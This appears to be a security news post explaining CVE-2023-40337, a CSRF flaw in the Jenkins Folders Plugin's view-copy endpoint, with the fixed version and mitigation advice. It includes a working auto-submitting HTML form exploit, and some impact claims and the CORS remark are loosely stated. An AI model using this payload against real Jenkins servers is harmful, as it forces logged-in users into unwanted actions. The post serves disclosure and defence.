CVE CyberSecurity Database News

CVE-2023-40337 - Exploiting CSRF in Jenkins Folders Plugin to Copy Views Inside Folders

Poster -

Jenkins is one of the world's most popular automation servers. It's used everywhere from tiny hobby projects to the biggest companies. Because it’s so widely adopted, vulnerabilities in its plugins can have a huge impact. In this post, we’ll dig into CVE-2023-40337—a Cross-Site Request Forgery (CSRF) vulnerability found in the Jenkins Folders Plugin up to version 6.846.v23698686ff6. Using clear language and code samples, we’ll see how this bug works, how an attacker could exploit it, and what you should do to protect yourself.

What is Jenkins Folders Plugin?

Jenkins by default places everything in one big workspace, but big projects or enterprises might want more order. The Folders Plugin brings in the ability to organize jobs into folders, create views inside folders, and much more. It’s a standard plugin in many Jenkins setups.

> Folders Plugin on Jenkins: Wiki

What is CVE-2023-40337 Exactly?

A CSRF (Cross-Site Request Forgery) bug allows attackers to trick a user into performing an unwanted action on a web application they’re authenticated with—usually by tricking them into clicking a malicious link or loading a page.

CVE-2023-40337 affects the Folders Plugin before 6.846.v23698686ff6. This plugin has a view-copying feature—say you want to copy a dashboard view from one folder to another for efficiency. But it turns out the web request used to perform a view copy does not check for a CSRF protection token. This means any external web page can trigger the authenticated user’s browser to copy a view in Jenkins—without their consent.

In Plain Terms

If you’re logged into Jenkins and you visit a malicious site, attackers can silently copy views inside your folders—messing with your workspace, disclosing otherwise-locked-down project information, or sowing confusion.

How Does the Exploit Work?

All an attacker needs to do is craft a web page or even just a form that submits an HTTP POST request to the vulnerable Jenkins endpoint. When a user with the right folder permission loads the attacker’s site, their browser forwards the malicious request *with* their credentials (like session cookies).

Example Exploit Code

Let’s make a simple HTML page that exploits this vulnerability. (Don’t use this on production systems—this is for demonstration and defense.)

Suppose the Jenkins server is at jenkins.example.com. There is a folder called myfolder, and you want to copy a view named build-stats to a new view called copied-view.

<html>
  <body>
    <form id="csrf-exploit" action="http://jenkins.example.com/job/myfolder/view/build-stats/copy"; method="POST">
      <input type="hidden" name="name" value="copied-view" />
      <input type="hidden" name="Submit" value="OK" />
    </form>
    <script>
      // Auto-submit the form when the page loads
      document.getElementById('csrf-exploit').submit();
    </script>
    <p>If you see this, the CSRF exploit failed (JavaScript required).</p>
  </body>
</html>

The exploit triggers as soon as the user loads the page!

> Note: Modern browsers may block cross-domain requests (CORS). However, many Jenkins instances are installed on local or corporate networks where access is less restricted.

If exploited, this vulnerability can let attackers

- Copy internal or restricted views. This could expose build logs, secrets, test output, job config, and more.

Alter folder structure. Confuse or disrupt legitimate users.

- Chain with other permissions. If copied views auto-inherit permissions, information might leak further.

Yes!

- Fixed Version: 6.847.v935a_8d6918e3 of the Folders Plugin introduced proper CSRF protection for the view-copy endpoint.

Jenkins Security Advisory (Sep 06, 2023):

https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3204

Official Plugin Site:

https://plugins.jenkins.io/cloudbees-folder/

CVE Details:

https://nvd.nist.gov/vuln/detail/CVE-2023-40337

Upgrade Folders Plugin to the latest version.

- Require CSRF Protection: Double-check global security in Jenkins (Manage Jenkins -> Configure Global Security). Ensure Prevent Cross Site Request Forgery exploits is enabled.

Summary

CVE-2023-40337 is a classic example of how a small miss in web security (CSRF token missing) can open big doors for an attacker—in this case, letting anyone trick Jenkins into copying views in folders. If you run Jenkins with the Folders Plugin, patch now, and keep your eye on other endpoints that might be lacking CSRF protection! Stay safe and automate smartly.


*This post is exclusive and written in plain language for busy Jenkins admins and devs. Let’s keep our pipelines secure!*

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 18:45:00 UTC